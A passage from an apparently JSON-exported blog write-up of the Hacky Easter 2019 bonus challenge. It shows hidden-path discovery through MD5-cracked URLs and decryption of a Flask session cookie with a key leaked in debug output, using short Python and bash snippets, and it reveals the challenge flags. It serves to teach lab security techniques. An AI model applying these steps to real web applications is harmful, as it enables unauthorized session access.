href=\"#chlg21\">egg22<\/a>:\n<br\/>\n<br\/><table><tr><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_02.jpg\" width=\"400\"\/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_03.jpg\" width=\"400\"\/><\/td><\/tr><\/table>\n<br\/>suggests, that the bonus level is an extra level of <code>The Hunt<\/code>.\n<br\/>\n<br\/>The website of the challenges contains a link to give feedback, which contains a disabled radio button called <code>Orbit - upcomming!<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_04.png\" width=\"1000\"\/>\n<br\/>\n<br\/>When sending feedback, the parameters are passed via GET:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_05.png\" width=\"1000\"\/>\n<br\/>\n<br\/>By adjusting the <code>path<\/code> parameter to <code>3<\/code> manually, the following notification is displayed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_06.png\" width=\"1000\"\/>\n<br\/>\n<br\/>This suggests that we have to determine how the link for path 1 and path 2 are built in order to deduce the link for path 3.\n<br\/>\n<br\/>The links for path 1 and path 2 seems be differentiated by a md5 checksum:\n<br\/>\n<br\/><code>http:\/\/whale.hacking-lab.com:5337\/1804161a0dabfdcd26f7370136e0f766<\/code>\n<br\/><code>http:\/\/whale.hacking-lab.com:5337\/7fde33818c41a1089088aa35b301afd9<\/code>\n<br\/>\n<br\/>These md5 checksums can actually be cracked and turned out to be <code>P4TH1<\/code> and <code>P4TH2<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# echo -n &#039;P4TH1&#039; | md5sum\n1804161a0dabfdcd26f7370136e0f766  -\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# echo -n &#039;P4TH2&#039; | md5sum\n7fde33818c41a1089088aa35b301afd9  -\n<\/pre><\/div>\n<br\/>Accordingly the link for path 3 can be build by calculating the md5 checksum of <code>P4TH3<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# echo -n &#039;P4TH3&#039; | md5sum\nbf42fa858de6db17c6daa54c4d912230  -\n<\/pre><\/div>\n<br\/>By browsing to the link <code>http:\/\/whale.hacking-lab.com:5337\/bf42fa858de6db17c6daa54c4d912230<\/code> we can access the hidden bonus level:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_07.png\" width=\"1000\"\/>\n<br\/>\n<br\/>After entering the flags from <a href=\"#chlg21\">egg21<\/a> (<code>he19-zKZr-YqJO-4OWb-auss<\/code>) and <a href=\"#chlg21\">egg22<\/a> (<code>he19-JfsM-ywiw-mSxE-yfYa<\/code>), we get to the following page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_08.png\" width=\"800\"\/>\n<br\/>\n<br\/>Moving around a little bit just like in the other paths shows the usual <code>Ouch! You would hit a wall.<\/code> notification:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_10.png\" width=\"800\"\/>\n<br\/>\n<br\/>Though there is also a new notification:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_09.png\" width=\"800\"\/>\n<br\/>\n<br\/>The notification <code>You are not god, you can't leave the area.<\/code> suggests that there are not only walls, but also a limited area, in which we can move.\n<br\/>\n<br\/>Thus we can adjust the script from <a href=\"#chlg21\">egg21<\/a> a little bit to handle this message:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\n  elif (&#039;You are not god&#039; in resp):\n    field&#x5B;curp&#x5B;0]+dtc&#x5B;0]]&#x5B;curp&#x5B;1]+dtc&#x5B;1]] = &#039;O&#039;\n\n<\/pre><\/div>\n<br\/>&#8230; and use the script to expose the map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_11.png\" width=\"500\"\/>\n<br\/>\n<br\/>Moving to the task, we get the following output:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_12.png\" width=\"700\"\/>\n<br\/>\n<br\/>According to the last line of the output, the flag has been added to the session data (<code>[DEBUG]: Flag added to session<\/code>). The first line actually outputs the secret session key, which is used to encrypt the client side stored session cookie (<code>[DEBUG]: app.crypto_key: ...<\/code>). The output contains four squares, which replace non printable characters. There is possible an easier way to figure out, what those characters actually are within the browser, though I simply used <code>Wireshark<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_13.png\" width=\"600\"\/>\n<br\/>\n<br\/>As we can see, the bytes are <code>0x01<\/code>, <code>0x03<\/code>, <code>0x03<\/code> and <code>0x07<\/code>.\n<br\/>\n<br\/>By googling for session encryption mechanisms employed with python flask, I found the following <a href=\"https:\/\/github.com\/SaintFlipper\/EncryptedSession\" target=\"_new\" rel=\"noopener noreferrer\">GitHub project called Encrypted Session<\/a>.\n<br\/>\n<br\/>According to the <a href=\"https:\/\/github.com\/SaintFlipper\/EncryptedSession\/blob\/master\/encrypted_session.py\" target=\"_new\" rel=\"noopener noreferrer\">source code<\/a>, the session data is encrypted using the secret key and <code>AES<\/code> with <code>AES.MODE_EAX<\/code>. The session data contains three parts separated by dots:\n<br\/>\n<br\/><code>u.<u>CIPHER_TEXT<\/u>.<u>MAC<\/u>.<u>NONCE<\/u><\/code>\n<br\/>\n<br\/>I wasted a lot of time to figure out, how the key (<code>\"timeto\\x01guess\\x03a\\x03last\\x07time\"<\/code> = 24 byte) could possibly be expanded to a 32 byte key. Actually no modification to the key is required. When using this 24-byte key <code>AES-192<\/code> is automatically applied. Knowing this we can easily decrypt the session data:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg27# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from Crypto.Cipher import AES\n&gt;&gt;&gt; key = &#039;timeto\\x01guess\\x03a\\x03last\\x07time&#039;\n&gt;&gt;&gt; cipher_text = &#039;pj9OWD4xrLMii5pStYUQ28\/crfOZTnzyk5NH0YvMkGRmSFMkb1XaPdl\/WSeIbdE7xbnG...&#039;.decode(&#039;base64&#039;)\n&gt;&gt;&gt; nonce = &#039;TZSKfNiijNS4AILH2p7seA==&#039;.decode(&#039;base64&#039;)\n&gt;&gt;&gt; cipher = AES.new(key, AES.MODE_EAX, nonce)\n&gt;&gt;&gt; cipher.decrypt(cipher_text)\n&#039;{&quot;c11&quot;: {&quot;a&quot;: 1}, &quot;c12&quot;: {&quot;a&quot;: 1}, &quot;c13&quot;: {&quot;a&quot;: 1}, &quot;c14&quot;: {&quot;a&quot;: 1}, &quot;c15&quot;: {&quot;a&quot;: 1}, &quot;c16&quot;: {&quot;a&quot;: 1}, &quot;c17&quot;: {&quot;a&quot;: 1}, &quot;c18&quot;: {&quot;a&quot;: 1}, &quot;c20&quot;: {&quot;a&quot;: 1}, &quot;t01&quot;: {&quot;a&quot;: 1}, &quot;f02&quot;: {&quot;a&quot;: 1}, &quot;c01&quot;: {&quot;a&quot;: 1}, &quot;c02&quot;: {&quot;a&quot;: 1}, &quot;c03&quot;: {&quot;a&quot;: 1}, &quot;c04&quot;: {&quot;a&quot;: 1}, &quot;c06&quot;: {&quot;a&quot;: 1}, &quot;c07&quot;: {&quot;a&quot;: 1}, &quot;c08&quot;: {&quot;a&quot;: 1}, &quot;c09&quot;: {&quot;a&quot;: 1}, &quot;f01&quot;: {&quot;a&quot;: 1}, &quot;h01&quot;: {&quot;a&quot;: 1}, &quot;v&quot;: &#x5B;], &quot;h&quot;: &#x5B;], &quot;m&quot;: {}, &quot;l&quot;: 10, &quot;hidden_flag&quot;: &quot;he19-fmRW-T6Oj-uNoT-dzOm&quot;, &quot;credit&quot;: &quot;thanks for playing! gz opasieben &amp; ccrypto :)&quot;, &quot;x&quot;: 34, &quot;y&quot;: 1, &quot;p&quot;: 3}&#039;\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-fmRW-T6Oj-uNoT-dzOm<\/span>.\n<br\/>\n","protected":false},"excerpt":{"rendered":"<p>As every year hacking-lab.com carried out the annual Hacky Easter event with 27 challenges. As usual the variety of the challenges was awesome. I actually got full score this year \ud83d\ude42 Many thanks to daubsi, who gave me a nudge once in a while on the last challenges (you can find his writeup here). Easy &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=1528\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Hacky Easter 2019 writeup&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,7],"tags":[8,9,13,18,16,21,17,10,11,12,28,19],"class_list":["post-1528","post","type-post","status-publish","format-standard","hentry","category-hacking-lab-com","category-writeup","tag-assembly","tag-binary","tag-elf","tag-gdb","tag-hacking-lab","tag-hackyeaster","tag-misc","tag-pwn","tag-r2","tag-reversing","tag-web","tag-x64"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1528"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1528"}],"version-history":[{"count":2,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1528\/revisions"}],"predecessor-version":[{"id":1530,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1528\/revisions\/1530"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}